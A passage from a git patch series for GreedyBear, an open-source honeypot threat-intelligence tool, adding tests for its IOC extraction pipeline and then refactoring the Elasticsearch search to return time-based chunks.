+                self.assertIn(
+                    expected_ip,
+                    ioc_names,
+                    f"Expected IOC with IP {expected_ip} to be in extracted records",
+                )
+
+    @patch("greedybear.cronjobs.extraction.pipeline.UpdateScores")
+    def test_ioc_scanner_field_contains_honeypot_type(self, mock_scores):
+        """
+        E2E: IOC scanner field should contain the honeypot type.
+
+        Verifies that the extracted IOC has the correct honeypot type
+        in its scanner field.
+        """
+        pipeline = self._create_pipeline_with_real_factory()
+
+        hits = [
+            MockElasticHit(
+                {
+                    "src_ip": "198.51.100.50",
+                    "type": "Heralding",
+                    "dest_port": 443,
+                    "@timestamp": "2025-01-15T16:00:00",
+                }
+            ),
+        ]
+        pipeline.elastic_repo.search.return_value = hits
+        pipeline.ioc_repo.is_empty.return_value = False
+        pipeline.ioc_repo.is_ready_for_extraction.return_value = True
+        pipeline.ioc_repo.get_ioc_by_name.return_value = None
+
+        mock_ioc = self._create_mock_ioc("198.51.100.50")
+        mock_ioc.name = "198.51.100.50"
+        mock_ioc.scanner = ["Heralding"]
+
+        with patch("greedybear.cronjobs.extraction.ioc_processor.IocProcessor.add_ioc") as mock_add:
+            mock_add.return_value = mock_ioc
+            result = pipeline.execute()
+
+        self.assertGreaterEqual(result, 0)
+
+        # Verify the scanner field in the IOC
+        if mock_scores.return_value.score_only.called:
+            call_args = mock_scores.return_value.score_only.call_args[0][0]
+            for ioc in call_args:
+                if ioc.name == "198.51.100.50":
+                    self.assertIn(
+                        "Heralding",
+                        ioc.scanner,
+                        "IOC scanner field should contain 'Heralding'",
+                    )
+                    break
diff --git a/tests/greedybear/cronjobs/test_extraction_pipeline_edge_cases.py b/tests/greedybear/cronjobs/test_extraction_pipeline_edge_cases.py
new file mode 100644
index 00000000..c313f691
--- /dev/null
+++ b/tests/greedybear/cronjobs/test_extraction_pipeline_edge_cases.py
@@ -0,0 +1,102 @@
+# This file is a part of GreedyBear https://github.com/honeynet/GreedyBear
+# See the file 'LICENSE' for copying permission.
+"""
+Edge case tests for ExtractionPipeline.
+
+These tests cover boundary conditions, error scenarios, and unusual inputs
+that the pipeline should handle gracefully.
+
+NOTE: Some tests here mock the factory/strategies because they test error
+conditions that cannot be reliably triggered with real strategies (e.g.,
+forcing a strategy to throw an exception). This is intentional and differs
+from the E2E tests which use real strategies for happy-path testing.
+"""
+
+from unittest.mock import MagicMock, patch
+
+from tests import E2ETestCase, MockElasticHit
+
+
+class TestEdgeCases(E2ETestCase):
+    """Edge case tests for the extraction pipeline.
+
+    These tests verify error handling and boundary conditions.
+    Some tests mock the factory to control failure scenarios.
+    """
+
+    @patch("greedybear.cronjobs.extraction.pipeline.UpdateScores")
+    @patch("greedybear.cronjobs.extraction.pipeline.ExtractionStrategyFactory")
+    def test_partial_strategy_success(self, mock_factory, mock_scores):
+        """Some strategies succeed, some fail - pipeline continues.
+
+        NOTE: This test mocks factory because we need to force one strategy
+        to throw an exception, which cannot be done reliably with real strategies.
+        """
+        pipeline = self._create_pipeline_with_real_factory()
+        pipeline.log = MagicMock()
+
+        hits = [
+            MockElasticHit({"src_ip": "1.1.1.1", "type": "FailingHoneypot"}),
+            MockElasticHit({"src_ip": "2.2.2.2", "type": "SuccessHoneypot"}),
+        ]
+        pipeline.elastic_repo.search.return_value = hits
+        pipeline.ioc_repo.is_empty.return_value = False
+        pipeline.ioc_repo.is_ready_for_extraction.return_value = True
+
+        mock_failing = MagicMock()
+        mock_failing.extract_from_hits.side_effect = Exception("Boom")
+
+        mock_success = MagicMock()
+        mock_success.ioc_records = [self._create_mock_ioc("2.2.2.2")]
+
+        mock_factory.return_value.get_strategy.side_effect = [mock_failing, mock_success]
+
+        result = pipeline.execute()
+
+        # Should return 1 (one success)
+        self.assertEqual(result, 1)
+        # Should log 1 error
+        self.assertEqual(pipeline.log.error.call_count, 1)
+        # Scoring should be called with successful IOCs
+        mock_scores.return_value.score_only.assert_called_once()
+
+
+class TestLargeBatches(E2ETestCase):
+    """Tests for large batch processing using REAL strategies."""
+
+    @patch("greedybear.cronjobs.extraction.pipeline.UpdateScores")
+    def test_large_batch_of_hits_with_real_strategy(self, mock_scores):
+        """Large number of hits should be processed correctly with real strategies.
+
+        Uses real GenericExtractionStrategy (via unknown honeypot type) to verify
+        the pipeline can handle large batches.
+        """
+        pipeline = self._create_pipeline_with_real_factory()
+
+        # Create 100 hits to test batch processing
+        hits = [
+            MockElasticHit(
+                {
+                    "src_ip": f"192.168.{i // 256}.{i % 256}",
+                    "type": "TestHoneypot",  # Unknown type → uses GenericExtractionStrategy
+                    "dest_port": 22,
+                    "@timestamp": "2025-01-15T10:00:00",
+                }
+            )
+            for i in range(100)
+        ]
+        pipeline.elastic_repo.search.return_value = hits
+        pipeline.ioc_repo.is_empty.return_value = False
+        pipeline.ioc_repo.is_ready_for_extraction.return_value = True
+        pipeline.ioc_repo.get_ioc_by_name.return_value = None
+
+        # Mock add_ioc to return mock IOCs
+        mock_iocs = [self._create_mock_ioc(f"192.168.{i // 256}.{i % 256}") for i in range(100)]
+
+        with patch("greedybear.cronjobs.extraction.ioc_processor.IocProcessor.add_ioc") as mock_add:
+            # Return different mock IOCs for each call
+            mock_add.side_effect = mock_iocs
+            result = pipeline.execute()
+
+        # Should have processed hits and produced IOCs
+        self.assertGreaterEqual(result, 0)
diff --git a/tests/greedybear/cronjobs/test_extraction_pipeline_factory.py b/tests/greedybear/cronjobs/test_extraction_pipeline_factory.py
new file mode 100644
index 00000000..ca658850
--- /dev/null
+++ b/tests/greedybear/cronjobs/test_extraction_pipeline_factory.py
@@ -0,0 +1,87 @@
+# This file is a part of GreedyBear https://github.com/honeynet/GreedyBear
+# See the file 'LICENSE' for copying permission.
+"""
+Tests for ExtractionStrategyFactory.
+"""
+
+from unittest.mock import MagicMock
+
+from tests import ExtractionTestCase
+
+
+class TestExtractionStrategyFactory(ExtractionTestCase):
+    """Tests for ExtractionStrategyFactory."""
+
+    def test_factory_creates_cowrie_strategy_for_cowrie(self):
+        """Factory should return CowrieExtractionStrategy for 'Cowrie' honeypot."""
+        from greedybear.cronjobs.extraction.strategies import CowrieExtractionStrategy
+        from greedybear.cronjobs.extraction.strategies.factory import ExtractionStrategyFactory
+
+        factory = ExtractionStrategyFactory(MagicMock(), MagicMock())
+        strategy = factory.get_strategy("Cowrie")
+
+        self.assertIsInstance(strategy, CowrieExtractionStrategy)
+
+    def test_factory_creates_log4pot_strategy_for_log4pot(self):
+        """Factory should return Log4potExtractionStrategy for 'Log4pot' honeypot."""
+        from greedybear.cronjobs.extraction.strategies import Log4potExtractionStrategy
+        from greedybear.cronjobs.extraction.strategies.factory import ExtractionStrategyFactory
+
+        factory = ExtractionStrategyFactory(MagicMock(), MagicMock())
+        strategy = factory.get_strategy("Log4pot")
+
+        self.assertIsInstance(strategy, Log4potExtractionStrategy)
+
+    def test_factory_creates_generic_strategy_for_unknown(self):
+        """Factory should return GenericExtractionStrategy for unknown honeypots."""
+        from greedybear.cronjobs.extraction.strategies import GenericExtractionStrategy
+        from greedybear.cronjobs.extraction.strategies.factory import ExtractionStrategyFactory
+
+        factory = ExtractionStrategyFactory(MagicMock(), MagicMock())
+        strategy = factory.get_strategy("UnknownHoneypot")
+
+        self.assertIsInstance(strategy, GenericExtractionStrategy)
+        self.assertEqual(strategy.honeypot, "UnknownHoneypot")
+
+    def test_factory_case_sensitive_honeypot_names(self):
+        """Factory honeypot matching should be case-sensitive."""
+        from greedybear.cronjobs.extraction.strategies import GenericExtractionStrategy
+        from greedybear.cronjobs.extraction.strategies.factory import ExtractionStrategyFactory
+
+        factory = ExtractionStrategyFactory(MagicMock(), MagicMock())
+
+        # 'cowrie' (lowercase) should get generic strategy, not Cowrie strategy
+        strategy = factory.get_strategy("cowrie")
+        self.assertIsInstance(strategy, GenericExtractionStrategy)
+
+        # 'COWRIE' (uppercase) should also get generic strategy
+        strategy = factory.get_strategy("COWRIE")
+        self.assertIsInstance(strategy, GenericExtractionStrategy)
+
+    def test_factory_strategies_have_correct_honeypot_name(self):
+        """Factory-created strategies should have the correct honeypot name."""
+        from greedybear.cronjobs.extraction.strategies.factory import ExtractionStrategyFactory
+
+        factory = ExtractionStrategyFactory(MagicMock(), MagicMock())
+
+        cowrie_strategy = factory.get_strategy("Cowrie")
+        self.assertEqual(cowrie_strategy.honeypot, "Cowrie")
+
+        log4pot_strategy = factory.get_strategy("Log4pot")
+        self.assertEqual(log4pot_strategy.honeypot, "Log4pot")
+
+        generic_strategy = factory.get_strategy("Heralding")
+        self.assertEqual(generic_strategy.honeypot, "Heralding")
+
+    def test_factory_passes_repositories_to_strategies(self):
+        """Factory should pass repositories to created strategies."""
+        from greedybear.cronjobs.extraction.strategies.factory import ExtractionStrategyFactory
+
+        mock_ioc_repo = MagicMock()
+        mock_sensor_repo = MagicMock()
+
+        factory = ExtractionStrategyFactory(mock_ioc_repo, mock_sensor_repo)
+        strategy = factory.get_strategy("Cowrie")
+
+        self.assertEqual(strategy.ioc_repo, mock_ioc_repo)
+        self.assertEqual(strategy.sensor_repo, mock_sensor_repo)
diff --git a/tests/greedybear/cronjobs/test_extraction_pipeline_grouping.py b/tests/greedybear/cronjobs/test_extraction_pipeline_grouping.py
new file mode 100644
index 00000000..18eed9b3
--- /dev/null
+++ b/tests/greedybear/cronjobs/test_extraction_pipeline_grouping.py
@@ -0,0 +1,236 @@
+# This file is a part of GreedyBear https://github.com/honeynet/GreedyBear
+# See the file 'LICENSE' for copying permission.
+"""
+Tests for hit filtering, grouping, and sensor extraction in ExtractionPipeline.
+"""
+
+from unittest.mock import MagicMock, patch
+
+from tests import ExtractionTestCase, MockElasticHit
+
+
+class ExtractionPipelineTestCase(ExtractionTestCase):
+    """Base test case for extraction pipeline tests."""
+
+    def _create_pipeline_with_mocks(self):
+        """Helper to create a pipeline with mocked dependencies."""
+        with (
+            patch("greedybear.cronjobs.extraction.pipeline.SensorRepository"),
+            patch("greedybear.cronjobs.extraction.pipeline.IocRepository"),
+            patch("greedybear.cronjobs.extraction.pipeline.ElasticRepository"),
+        ):
+            from greedybear.cronjobs.extraction.pipeline import ExtractionPipeline
+
+            pipeline = ExtractionPipeline()
+            return pipeline
+
+
+class TestHitFiltering(ExtractionPipelineTestCase):
+    """Tests for hit filtering logic in execute()."""
+
+    @patch("greedybear.cronjobs.extraction.pipeline.UpdateScores")
+    @patch("greedybear.cronjobs.extraction.pipeline.ExtractionStrategyFactory")
+    def test_skips_hits_without_src_ip(self, mock_factory, mock_scores):
+        """Hits without src_ip should be skipped."""
+        pipeline = self._create_pipeline_with_mocks()
+        pipeline.elastic_repo.search.return_value = [
+            MockElasticHit({"type": "Cowrie"}),  # missing src_ip
+            MockElasticHit({"src_ip": "", "type": "Cowrie"}),  # empty src_ip
+            MockElasticHit({"src_ip": "   ", "type": "Cowrie"}),  # whitespace-only src_ip
+        ]
+        pipeline.ioc_repo.is_empty.return_value = False
+
+        result = pipeline.execute()
+
+        self.assertEqual(result, 0)
+        mock_factory.return_value.get_strategy.assert_not_called()
+
+    @patch("greedybear.cronjobs.extraction.pipeline.UpdateScores")
+    @patch("greedybear.cronjobs.extraction.pipeline.ExtractionStrategyFactory")
+    def test_skips_hits_without_type(self, mock_factory, mock_scores):
+        """Hits without type (honeypot) should be skipped."""
+        pipeline = self._create_pipeline_with_mocks()
+        pipeline.elastic_repo.search.return_value = [
+            MockElasticHit({"src_ip": "1.2.3.4"}),  # missing type
+            MockElasticHit({"src_ip": "1.2.3.4", "type": ""}),  # empty type
+            MockElasticHit({"src_ip": "1.2.3.4", "type": "   "}),  # whitespace-only type
+        ]
+        pipeline.ioc_repo.is_empty.return_value = False
+
+        result = pipeline.execute()
+
+        self.assertEqual(result, 0)
+        mock_factory.return_value.get_strategy.assert_not_called()
+
+    @patch("greedybear.cronjobs.extraction.pipeline.UpdateScores")
+    @patch("greedybear.cronjobs.extraction.pipeline.ExtractionStrategyFactory")
+    def test_handles_empty_search_result(self, mock_factory, mock_scores):
+        """Should handle empty Elasticsearch response gracefully."""
+        pipeline = self._create_pipeline_with_mocks()
+        pipeline.elastic_repo.search.return_value = []
+        pipeline.ioc_repo.is_empty.return_value = False
+
+        result = pipeline.execute()
+
+        self.assertEqual(result, 0)
+        mock_factory.return_value.get_strategy.assert_not_called()
+        mock_scores.return_value.score_only.assert_not_called()
+
+
+class TestSensorExtraction(ExtractionPipelineTestCase):
+    """Tests for sensor extraction from hits."""
+
+    @patch("greedybear.cronjobs.extraction.pipeline.LEGACY_EXTRACTION", False)
+    @patch("greedybear.cronjobs.extraction.pipeline.EXTRACTION_INTERVAL", 10)
+    @patch("greedybear.cronjobs.extraction.pipeline.UpdateScores")
+    @patch("greedybear.cronjobs.extraction.pipeline.ExtractionStrategyFactory")
+    def test_extracts_sensor_from_hits(self, mock_factory, mock_scores):
+        """
+        Should extract and register sensors from t-pot_ip_ext field.
+        Also verifies correct time window is passed to search().
+        """
+        pipeline = self._create_pipeline_with_mocks()
+        pipeline.elastic_repo.search.return_value = [
+            MockElasticHit({"src_ip": "1.2.3.4", "type": "Cowrie", "t-pot_ip_ext": "10.0.0.1"}),
+        ]
+        pipeline.ioc_repo.is_empty.return_value = False
+        pipeline.ioc_repo.is_ready_for_extraction.return_value = False  # Skip strategy for this test
+
+        pipeline.execute()
+
+        pipeline.sensor_repo.add_sensor.assert_called_once_with("10.0.0.1")
+        pipeline.elastic_repo.search.assert_called_once_with(10)
+
+    @patch("greedybear.cronjobs.extraction.pipeline.UpdateScores")
+    @patch("greedybear.cronjobs.extraction.pipeline.ExtractionStrategyFactory")
+    def test_sensor_not_extracted_for_invalid_hits(self, mock_factory, mock_scores):
+        """
+        Sensors should NOT be extracted for hits that fail validation.
+        Even if t-pot_ip_ext is present, missing required fields should skip sensor extraction.
+        """
+        pipeline = self._create_pipeline_with_mocks()
+
+        # Hit with sensor but missing type
+        hits = [
+            MockElasticHit(
+                {
+                    "src_ip": "192.168.1.1",
+                    "t-pot_ip_ext": "10.0.0.99",
+                    # Missing 'type' field
+                }
+            ),
+        ]
+        pipeline.elastic_repo.search.return_value = hits
+        pipeline.ioc_repo.is_empty.return_value = False
+
+        pipeline.execute()
+
+        # Sensor should NOT be extracted for invalid hits (missing type)
+        pipeline.sensor_repo.add_sensor.assert_not_called()
+
+
+class TestHitGrouping(ExtractionPipelineTestCase):
+    """Tests for hit grouping by honeypot type."""
+
+    @patch("greedybear.cronjobs.extraction.pipeline.UpdateScores")
+    @patch("greedybear.cronjobs.extraction.pipeline.ExtractionStrategyFactory")
+    def test_groups_hits_by_honeypot_type(self, mock_factory, mock_scores):
+        """Hits should be grouped by honeypot type before extraction."""
+        pipeline = self._create_pipeline_with_mocks()
+        pipeline.elastic_repo.search.return_value = [
+            MockElasticHit({"src_ip": "1.2.3.4", "type": "Cowrie"}),
+            MockElasticHit({"src_ip": "5.6.7.8", "type": "Cowrie"}),
+            MockElasticHit({"src_ip": "9.10.11.12", "type": "Log4pot"}),
+        ]
+        pipeline.ioc_repo.is_empty.return_value = False
+        pipeline.ioc_repo.is_ready_for_extraction.return_value = True
+
+        mock_strategy = MagicMock()
+        mock_strategy.ioc_records = []
+        mock_factory.return_value.get_strategy.return_value = mock_strategy
+
+        pipeline.execute()
+
+        # Should be called for both honeypot types
+        self.assertEqual(mock_factory.return_value.get_strategy.call_count, 2)
+
+        # Verify strategy is called with correct honeypot types
+        calls = mock_factory.return_value.get_strategy.call_args_list
+        honeypot_names = {call[0][0] for call in calls}
+        self.assertEqual(honeypot_names, {"Cowrie", "Log4pot"})
+
+        # Verify extract_from_hits is called twice
+        self.assertEqual(mock_strategy.extract_from_hits.call_count, 2)
+
+        # Verify each strategy received correct number of hits
+        extraction_calls = mock_strategy.extract_from_hits.call_args_list
+        hits_counts = sorted([len(call[0][0]) for call in extraction_calls])
+        self.assertEqual(hits_counts, [1, 2])  # 1 Log4pot hit, 2 Cowrie hits
+
+    @patch("greedybear.cronjobs.extraction.pipeline.UpdateScores")
+    @patch("greedybear.cronjobs.extraction.pipeline.ExtractionStrategyFactory")
+    def test_duplicate_honeypot_hits_grouped(self, mock_factory, mock_scores):
+        """Multiple hits from same honeypot type are grouped together."""
+        pipeline = self._create_pipeline_with_mocks()
+
+        hits = [
+            MockElasticHit({"src_ip": "1.1.1.1", "type": "Cowrie"}),
+            MockElasticHit({"src_ip": "2.2.2.2", "type": "Cowrie"}),
+            MockElasticHit({"src_ip": "3.3.3.3", "type": "Cowrie"}),
+        ]
+        pipeline.elastic_repo.search.return_value = hits
+        pipeline.ioc_repo.is_empty.return_value = False
+        pipeline.ioc_repo.is_ready_for_extraction.return_value = True
+
+        mock_strategy = MagicMock()
+        mock_strategy.ioc_records = [self._create_mock_ioc("1.1.1.1")]
+        mock_factory.return_value.get_strategy.return_value = mock_strategy
+
+        pipeline.execute()
+
+        # Strategy should be called only ONCE with all 3 hits grouped
+        mock_factory.return_value.get_strategy.assert_called_once_with("Cowrie")
+        self.assertEqual(mock_strategy.extract_from_hits.call_count, 1)
+
+        # Verify all 3 hits were passed together
+        call_args = mock_strategy.extract_from_hits.call_args[0][0]
+        self.assertEqual(len(call_args), 3)
+
+    @patch("greedybear.cronjobs.extraction.pipeline.UpdateScores")
+    @patch("greedybear.cronjobs.extraction.pipeline.ExtractionStrategyFactory")
+    def test_honeypot_skipped_when_not_ready(self, mock_factory, mock_scores):
+        """Honeypots not ready for extraction should be skipped."""
+        pipeline = self._create_pipeline_with_mocks()
+
+        hits = [
+            MockElasticHit(
+                {
+                    "src_ip": "1.2.3.4",
+                    "type": "DisabledHoneypot",
+                    "t-pot_ip_ext": "10.0.0.1",
+                }
+            ),
+            MockElasticHit(
+                {
+                    "src_ip": "5.6.7.8",
+                    "type": "EnabledHoneypot",
+                    "t-pot_ip_ext": "10.0.0.2",
+                }
+            ),
+        ]
+        pipeline.elastic_repo.search.return_value = hits
+        pipeline.ioc_repo.is_empty.return_value = False
+
+        # First honeypot disabled, second enabled
+        pipeline.ioc_repo.is_ready_for_extraction.side_effect = [False, True]
+
+        mock_strategy = MagicMock()
+        mock_strategy.ioc_records = [self._create_mock_ioc("5.6.7.8")]
+        mock_factory.return_value.get_strategy.return_value = mock_strategy
+
+        result = pipeline.execute()
+
+        # Should only process the enabled honeypot
+        self.assertEqual(result, 1)
+        # Factory should only be called once (for EnabledHoneypot)
+        mock_factory.return_value.get_strategy.assert_called_once_with("EnabledHoneypot")
diff --git a/tests/greedybear/cronjobs/test_extraction_pipeline_init.py b/tests/greedybear/cronjobs/test_extraction_pipeline_init.py
new file mode 100644
index 00000000..18e81e60
--- /dev/null
+++ b/tests/greedybear/cronjobs/test_extraction_pipeline_init.py
@@ -0,0 +1,80 @@
+# This file is a part of GreedyBear https://github.com/honeynet/GreedyBear
+# See the file 'LICENSE' for copying permission.
+"""
+Tests for ExtractionPipeline initialization and time window calculation.
+"""
+
+from unittest.mock import patch
+
+from tests import ExtractionTestCase
+
+
+class TestExtractionPipelineInit(ExtractionTestCase):
+    """Tests for ExtractionPipeline initialization."""
+
+    @patch("greedybear.cronjobs.extraction.pipeline.SensorRepository")
+    @patch("greedybear.cronjobs.extraction.pipeline.IocRepository")
+    @patch("greedybear.cronjobs.extraction.pipeline.ElasticRepository")
+    def test_initializes_repositories(self, mock_elastic, mock_ioc, mock_sensor):
+        """Pipeline should initialize all required repositories."""
+        from greedybear.cronjobs.extraction.pipeline import ExtractionPipeline
+
+        pipeline = ExtractionPipeline()
+
+        mock_elastic.assert_called_once()
+        mock_ioc.assert_called_once()
+        mock_sensor.assert_called_once()
+        self.assertIsNotNone(pipeline.log)
+
+
+class TestMinutesBackToLookup(ExtractionTestCase):
+    """Tests for the _minutes_back_to_lookup property."""
+
+    @patch("greedybear.cronjobs.extraction.pipeline.LEGACY_EXTRACTION", False)
+    @patch("greedybear.cronjobs.extraction.pipeline.EXTRACTION_INTERVAL", 5)
+    @patch("greedybear.cronjobs.extraction.pipeline.INITIAL_EXTRACTION_TIMESPAN", 120)
+    @patch("greedybear.cronjobs.extraction.pipeline.SensorRepository")
+    @patch("greedybear.cronjobs.extraction.pipeline.IocRepository")
+    @patch("greedybear.cronjobs.extraction.pipeline.ElasticRepository")
+    def test_returns_initial_timespan_when_empty(self, mock_elastic, mock_ioc, mock_sensor):
+        """Should return INITIAL_EXTRACTION_TIMESPAN on first run (empty DB)."""
+        from greedybear.cronjobs.extraction.pipeline import ExtractionPipeline
+
+        pipeline = ExtractionPipeline()
+        pipeline.ioc_repo.is_empty.return_value = True
+
+        result = pipeline._minutes_back_to_lookup
+
+        self.assertEqual(result, 120)
+
+    @patch("greedybear.cronjobs.extraction.pipeline.LEGACY_EXTRACTION", False)
+    @patch("greedybear.cronjobs.extraction.pipeline.EXTRACTION_INTERVAL", 5)
+    @patch("greedybear.cronjobs.extraction.pipeline.SensorRepository")
+    @patch("greedybear.cronjobs.extraction.pipeline.IocRepository")
+    @patch("greedybear.cronjobs.extraction.pipeline.ElasticRepository")
+    def test_returns_extraction_interval_when_not_empty(self, mock_elastic, mock_ioc, mock_sensor):
+        """Should return EXTRACTION_INTERVAL for subsequent runs."""
+        from greedybear.cronjobs.extraction.pipeline import ExtractionPipeline
+
+        pipeline = ExtractionPipeline()
+        pipeline.ioc_repo.is_empty.return_value = False
+
+        result = pipeline._minutes_back_to_lookup
+
+        self.assertEqual(result, 5)
+
+    @patch("greedybear.cronjobs.extraction.pipeline.LEGACY_EXTRACTION", True)
+    @patch("greedybear.cronjobs.extraction.pipeline.EXTRACTION_INTERVAL", 5)
+    @patch("greedybear.cronjobs.extraction.pipeline.SensorRepository")
+    @patch("greedybear.cronjobs.extraction.pipeline.IocRepository")
+    @patch("greedybear.cronjobs.extraction.pipeline.ElasticRepository")
+    def test_returns_11_for_legacy_extraction(self, mock_elastic, mock_ioc, mock_sensor):
+        """Should return 11 when LEGACY_EXTRACTION is enabled."""
+        from greedybear.cronjobs.extraction.pipeline import ExtractionPipeline
+
+        pipeline = ExtractionPipeline()
+        pipeline.ioc_repo.is_empty.return_value = False
+
+        result = pipeline._minutes_back_to_lookup
+
+        self.assertEqual(result, 11)

From 3e437c9b0554b19c4d95402310f2975332cf177a Mon Sep 17 00:00:00 2001
From: tim <46972822+regulartim@users.noreply.github.com>
Date: Thu, 29 Jan 2026 18:11:39 +0100
Subject: [PATCH 72/75] Reduce memory usage by chunking Elasticsearch queries.
 Closes #630 (#750)

* remove legacy extraction

* change extraction logic to use time-based chunks

* remove LEGACY_EXTRACTION references in tests

* adapt tests

* fix format

* add test for chunking
---
 docker/env_file_template                      |   2 -
 greedybear/celery.py                          |   4 +-
 greedybear/cronjobs/extraction/pipeline.py    |  81 +++----
 greedybear/cronjobs/repositories/elastic.py   |  88 +++----
 greedybear/settings.py                        |   1 -
 .../cronjobs/test_extraction_pipeline_e2e.py  |  22 +-
 .../test_extraction_pipeline_edge_cases.py    |   4 +-
 .../test_extraction_pipeline_grouping.py      | 140 ++++++++++--
 .../cronjobs/test_extraction_pipeline_init.py |  18 --
 tests/test_elastic_repository.py              | 216 +++++++++++++-----
 10 files changed, 364 insertions(+), 212 deletions(-)

diff --git a/docker/env_file_template b/docker/env_file_template
index 890f102d..b8363a06 100644
--- a/docker/env_file_template
+++ b/docker/env_file_template
@@ -46,8 +46,6 @@ MOCK_CONNECTIONS=False
 # True for public deployment, False for internal deployment
 PUBLIC_DEPLOYMENT=False
 
-# Set True for use with TPot instances prior to version 24.04
-LEGACY_EXTRACTION=False
 # Interval for the honeypot data extraction in minutes (only choose divisors of 60)
 EXTRACTION_INTERVAL=10
 
diff --git a/greedybear/celery.py b/greedybear/celery.py
index db1500e2..53b3c383 100644
--- a/greedybear/celery.py
+++ b/greedybear/celery.py
@@ -9,7 +9,7 @@
 from django.conf import settings
 from kombu import Exchange, Queue
 
-from greedybear.settings import EXTRACTION_INTERVAL, LEGACY_EXTRACTION
+from greedybear.settings import EXTRACTION_INTERVAL
 
 os.environ.setdefault("DJANGO_SETTINGS_MODULE", "greedybear.settings")
 
@@ -56,7 +56,7 @@ def setup_loggers(*args, **kwargs):
     dictConfig(settings.LOGGING)
 
 
-hp_extraction_interval = 10 if LEGACY_EXTRACTION else EXTRACTION_INTERVAL
+hp_extraction_interval = EXTRACTION_INTERVAL
 app.conf.beat_schedule = {
     # every 10 minutes or according to EXTRACTION_INTERVAL
     "extract_all": {
diff --git a/greedybear/cronjobs/extraction/pipeline.py b/greedybear/cronjobs/extraction/pipeline.py
index 189140dc..9874cb5e 100644
--- a/greedybear/cronjobs/extraction/pipeline.py
+++ b/greedybear/cronjobs/extraction/pipeline.py
@@ -11,7 +11,6 @@
 from greedybear.settings import (
     EXTRACTION_INTERVAL,
     INITIAL_EXTRACTION_TIMESPAN,
-    LEGACY_EXTRACTION,
 )
 
 
@@ -40,57 +39,61 @@ def _minutes_back_to_lookup(self) -> int:
         """
         if self.ioc_repo.is_empty():
             return INITIAL_EXTRACTION_TIMESPAN
-        return 11 if LEGACY_EXTRACTION else EXTRACTION_INTERVAL
+        return EXTRACTION_INTERVAL
 
     def execute(self) -> int:
         """
         Execute the extraction pipeline.
 
         Performs the following steps:
-        1. Search Elasticsearch for honeypot log entries
-        2. Group hits by honeypot type and extract sensors
+        1. Search Elasticsearch for honeypot log entries in chunks
+        2. For each chunk, group hits by honeypot type and extract sensors
         3. Apply honeypot-specific extraction strategies
         4. Update IOC scores
 
         Returns:
             Number of IOC records processed.
         """
-        # 1. Search
+        ioc_record_count = 0
+        factory = ExtractionStrategyFactory(self.ioc_repo, self.sensor_repo)
+
+        # 1. Search in chunks
         self.log.info("Getting honeypot hits from Elasticsearch")
-        search_result = self.elastic_repo.search(self._minutes_back_to_lookup)
-        hits_by_honeypot = defaultdict(list)
+        for chunk in self.elastic_repo.search(self._minutes_back_to_lookup):
+            ioc_records = []
+            hits_by_honeypot = defaultdict(list)
 
-        # 2. Group by honeypot
-        self.log.info("Grouping hits by honeypot type")
-        for hit in search_result:
-            # skip hits with non-existing or empty sources
-            if "src_ip" not in hit or not hit["src_ip"].strip():
-                continue
-            # skip hits with non-existing or empty types (=honeypots)
-            if "type" not in hit or not hit["type"].strip():
-                continue
-            # extract sensor
-            if "t-pot_ip_ext" in hit:
-                self.sensor_repo.add_sensor(hit["t-pot_ip_ext"])
-            hits_by_honeypot[hit["type"]].append(hit.to_dict())
+            # 2. Group by honeypot
+            self.log.info("Grouping hits by honeypot type")
+            for hit in chunk:
+                # skip hits with non-existing or empty sources
+                if "src_ip" not in hit or not hit["src_ip"].strip():
+                    continue
+                # skip hits with non-existing or empty types (=honeypots)
+                if "type" not in hit or not hit["type"].strip():
+                    continue
+                # extract sensor
+                if "t-pot_ip_ext" in hit:
+                    self.sensor_repo.add_sensor(hit["t-pot_ip_ext"])
+                hits_by_honeypot[hit["type"]].append(hit.to_dict())
 
-        # 3. Extract using strategies
-        ioc_records = []
-        factory = ExtractionStrategyFactory(self.ioc_repo, self.sensor_repo)
-        for honeypot, hits in sorted(hits_by_honeypot.items()):
-            if not self.ioc_repo.is_ready_for_extraction(honeypot):
-                self.log.info(f"Skipping honeypot {honeypot}")
-                continue
-            self.log.info(f"Extracting hits from honeypot {honeypot}")
-            strategy = factory.get_strategy(honeypot)
-            try:
-                strategy.extract_from_hits(hits)
-                ioc_records += strategy.ioc_records
-            except Exception as exc:
-                self.log.error(f"Extraction failed for honeypot {honeypot}: {exc}")
+            # 3. Extract using strategies
+            for honeypot, hits in sorted(hits_by_honeypot.items()):
+                if not self.ioc_repo.is_ready_for_extraction(honeypot):
+                    self.log.info(f"Skipping honeypot {honeypot}")
+                    continue
+                self.log.info(f"Extracting hits from honeypot {honeypot}")
+                strategy = factory.get_strategy(honeypot)
+                try:
+                    strategy.extract_from_hits(hits)
+                    ioc_records += strategy.ioc_records
+                except Exception as exc:
+                    self.log.error(f"Extraction failed for honeypot {honeypot}: {exc}")
+
+            # 4. Update scores
+            self.log.info("Updating scores")
+            if ioc_records:
+                UpdateScores().score_only(ioc_records)
+            ioc_record_count += len(ioc_records)
 
-        # 4. Update scores
-        self.log.info("Updating scores")
-        if ioc_records:
-            UpdateScores().score_only(ioc_records)
-        return len(ioc_records)
+        return ioc_record_count
diff --git a/greedybear/cronjobs/repositories/elastic.py b/greedybear/cronjobs/repositories/elastic.py
index 6895472d..0ca0716f 100644
--- a/greedybear/cronjobs/repositories/elastic.py
+++ b/greedybear/cronjobs/repositories/elastic.py
@@ -1,21 +1,20 @@
 import logging
+from collections.abc import Iterator
 from datetime import datetime, timedelta
 
 from django.conf import settings
 from elasticsearch.dsl import Q, Search
 
 from greedybear.consts import REQUIRED_FIELDS
-from greedybear.settings import EXTRACTION_INTERVAL, LEGACY_EXTRACTION
+from greedybear.settings import EXTRACTION_INTERVAL
 
 
 class ElasticRepository:
     """
     Repository for querying honeypot log data from a T-Pot Elasticsearch instance.
 
-    Provides a cached search interface for retrieving log entries within
+    Provides a chunked search interface for retrieving log entries within
     a specified time window from logstash indices.
-
-    This class is intended for individual extraction runs, so the cache never clears.
     """
 
     class ElasticServerDownError(Exception):
@@ -24,10 +23,9 @@ class ElasticServerDownError(Exception):
         pass
 
     def __init__(self):
-        """Initialize the repository with an Elasticsearch client and empty cache."""
+        """Initialize the repository with an Elasticsearch client."""
         self.log = logging.getLogger(f"{__name__}.{self.__class__.__name__}")
         self.elastic_client = settings.ELASTIC_CLIENT
-        self.search_cache = {}
 
     def has_honeypot_been_hit(self, minutes_back_to_lookup: int, honeypot_name: str) -> bool:
         """
@@ -36,84 +34,50 @@ def has_honeypot_been_hit(self, minutes_back_to_lookup: int, honeypot_name: str)
         Args:
             minutes_back_to_lookup: Number of minutes to look back from the current
                 time when searching for honeypot hits.
